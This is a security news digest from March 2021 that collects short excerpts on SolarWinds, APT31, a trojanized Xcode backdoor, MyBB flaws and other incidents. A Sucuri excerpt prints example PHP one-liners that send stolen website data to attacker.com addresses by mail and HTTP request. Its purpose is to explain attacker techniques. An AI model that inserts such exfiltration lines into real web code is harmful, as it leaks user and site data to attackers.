Security daily (18-03-2021)

How to scale your authorization needs by using attribute-based access control with S3

In this blog post, we show you how to scale your Amazon Simple Storage Service (Amazon S3) authorization strategy as an alternative to using path based authorization. You are going to combine attribute-based access control (ABAC) using AWS Identity and Access Management (IAM) with a standard Active Directory Federation Services (AD FS) connected to Microsoft […] (AWS Security Blog)

Highlights from the latest AWS Identity launches

Here is the latest from AWS Identity from November 2020 through February 2021. The features highlighted in this blog post can help you manage and secure your Amazon Web Services (AWS) environment. Identity services answer the question of who has access to what. They enable you to securely manage identities, resources, and permissions at scale and […] (AWS Security Blog)

Feds aren't well prepared to spot SolarWinds-style hacks at agencies, CISA official says

In one of the bluntest assessments of U.S. government security shortcomings around the SolarWinds hack, a top Department of Homeland Security official told senators on Thursday that federal defenses simply aren’t aligned properly to detect advanced attackers. The testimony before the Senate Homeland Security and Governmental Affairs Committee on federal cybersecurity weaknesses points to a forthcoming reorientation of how DHS’s Cybersecurity and Infrastructure Security Agency protects agencies from threats. It’s a shift resulting from the fallout from the hack at federal contractor SolarWinds that resulted in breaches at numerous federal agencies and major technology companies. And it’s a shift that Congress is aiding with $650 million that it recently appropriated for CISA. “Part of the challenge is that you can only secure what you can see,” Brandon Wales, acting director of the agency, told committee Chairman Gary Peters, D-Mich. “Over the past decade our system of protection has largely relied […] The post Feds aren't well prepared to spot SolarWinds-style hacks at agencies, CISA official says appeared first on CyberScoop. (CyberScoop)

Hackers target Apple developers with backdoor

Hackers appear to be targeting Apple developers with a backdoor that has worked its way into a shared Xcode project, according to SentinelOne research published Thursday. In a blog post, SentinelOne says an external researcher alerted the company about malicious code that was tainting a development project in Xcode, Apple’s integrated development environment (IDE) for macOS. The nefarious project, which the researchers say abuses the Run Script feature in Xcode, is a malicious version of an open-source project that’s been available on GitHub that’s intended to help developers with features in animating the iOS Tab Bar. The attackers have made a version of the project to execute a malicious script and target a victim’s development machine with a backdoor. If they leverage the backdoor properly the attackers could record through the victim’s microphone or camera, or log keystrokes from their keyboard. The hackers could also upload or download files, according […] The post Hackers target Apple developers with backdoor appeared first on CyberScoop. (CyberScoop)

Finland implicates China-linked APT31 in parliament hack

The Finnish government has blamed a group of suspected Chinese spies for hacking into the Finnish parliament last year and accessing emails. In a statement Thursday, Finnish intelligence officials pointed the finger at APT31, a hacking group that security researchers say operates on behalf of Chinese interests. The intrusions began last fall and were revealed in December, when the speaker of the Finnish parliament described it as “hostile cyber activity” that could harm Finnish interests. The Finnish Security and Intelligence Service labeled it a state-backed operation. That statement said APT31 was responsible, but did not name China directly. Separately, Finnish police on Thursday described the hacking as “aggravated espionage” and “message interception.” The Finnish statements are part of a pattern of increased willingness of U.S. allies in Europe to blame specific hacking groups for spying campaigns. Viktor Rantala, a Finnish scholar, said it was the first time that he could recall that […] The post Finland implicates China-linked APT31 in parliament hack appeared first on CyberScoop. (CyberScoop)

Cypriot sentenced for email hacking committed as teen

A 22-year-old from Cyprus was sentenced to a year in prison after pleading guilty to computer fraud conspiracy and computer fraud for hacking websites and extorting them for money, the Department of Justice announced Thursday. The Cypriot, Joshua Polloso Epifaniou, exploited security vulnerabilities to steal sensitive personal information from user and customer databases between October 2014 and November 2016, when he was a teen living with his mother, according to the Department of Justice. Epifaniou used the stolen information to log into email accounts and send messages to victim websites demanding a ransom and threatening to leak the sensitive data. Epifaniou also obtained information on targets from a co-conspirator who had previously hacked the websites. Epifaniou targeted a Turner Broadcasting System-owned sports news website in Georgia, a hardware company in New York, an online game publisher in California, a consumer report website in Arizona and an employment website located in […] The post Cypriot sentenced for email hacking committed as teen appeared first on CyberScoop. (CyberScoop)

S3 Ep24: How not to get snooped, scammed or hoaxed [Podcast]

Latest episode - listen now! (Naked Security)

State-Sponsored Threat Groups Target Telcos, Steal 5G Secrets

(News ≈ Packet Storm)

Attackers Are Trying Hard To Backdoor iOS Developer's Macs

(News ≈ Packet Storm)

Florida Mother, Daughter Charged With Hacking Homecoming Queen Election

(News ≈ Packet Storm)

Google Cloud: Here Are The Six Best Vulnerabilities Security Researchers Found Last Year

(News ≈ Packet Storm)

Server Side Data Exfiltration via Telegram API

One of the themes commonly highlighted on this blog includes the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware on the server level can be used for data exfiltration. What’s more, attackers may be able to accomplish this feat with a few mere lines of code. For example:

  Emailing the data:
    @mail("email@attacker.com", $_SERVER["SERVER_NAME"], $stolenData);

  Writing the data to a local file:
    fwrite($fh, $stolenData);

  Sending the data to an email address under the attacker’s control:
    @file_get_contents("http://attacker.com/cgi-bin/optimus.pl?prime=$stolenData");

  Writing the data to an image file within the website to avoid raising suspicion:
    $hellowp=fopen('./wp-content/uploads/2018/07/[redacted].jpg','a+');
    $write=fwrite($hellowp,$username_password,$time);

Harvesting & Exfiltrating Stolen Data via Telegram

One interesting technique our team has come across in recent months leverages the Telegram API to exfiltrate stolen data and send it in a private message to a bot under the attacker's control. Continue reading Server Side Data Exfiltration via Telegram API at Sucuri Blog. (Sucuri Blog)

Critical RCE Flaw Reported in MyBB Forum Software—Patch Your Sites

A pair of critical vulnerabilities in a popular bulletin board software called MyBB could have been chained together to achieve remote code execution (RCE) without the need for prior access to a privileged account. The flaws, which were discovered by independent security researchers Simon Scannell and Carl Smith, were reported to the MyBB Team on February 22, following which it released an (The Hacker News)

How to Successfully Pursue a Career in Malware Analysis

Are you looking to become a malware analyst? Then continue reading to discover how to gain the training you need and start a career in malware analysis. Did you know that new malware is released every seven seconds? As more and more systems become reliant on the internet, the proliferation of malware becomes increasingly destructive. Once upon a time, a computer virus might cause (The Hacker News)

Why Cached Credentials Can Cause Account Lockouts and How to Stop it

When a user account becomes locked out, the cause is often attributed to a user who has simply entered an old or incorrect password too many times. However, this is far from being the only thing that can cause an account to become locked. Another common cause, for example, is an application or script that is configured to log into the system using an old password. Perhaps the most easily (The Hacker News)

Fiserv Forgets to Buy Domain It Used as System Default

Fintech security provider Fiserv acknowledges it used unregistered domain as default email. (Threatpost)

Trojanized Xcode Project Slips MacOS Malware to Apple Developers

In a new campaign, threat actors are bundling macOS malware in trojanized Apple Xcode developer projects. (Threatpost)

Zoom Screen-Sharing Glitch ‘Briefly’ Leaks Sensitive Data

A glitch in Zoom's screen-sharing feature shows parts of presenters' screens that they did not intend to share - potentially leaking emails or passwords. (Threatpost)

Security Researcher Hides ZIP, MP3 Files Inside PNG Files on Twitter

The newly discovered steganography method could be exploited by threat actors to obscure nefarious activity inside photos hosted on the social-media platform. (Threatpost)

Tutor LMS for WordPress Open to Info-Stealing Security Holes

The popular learning-management system for teacher-student communication is rife with SQL-injection vulnerabilities. (Threatpost)

/security-daily/ 19-03-2021 23:44:23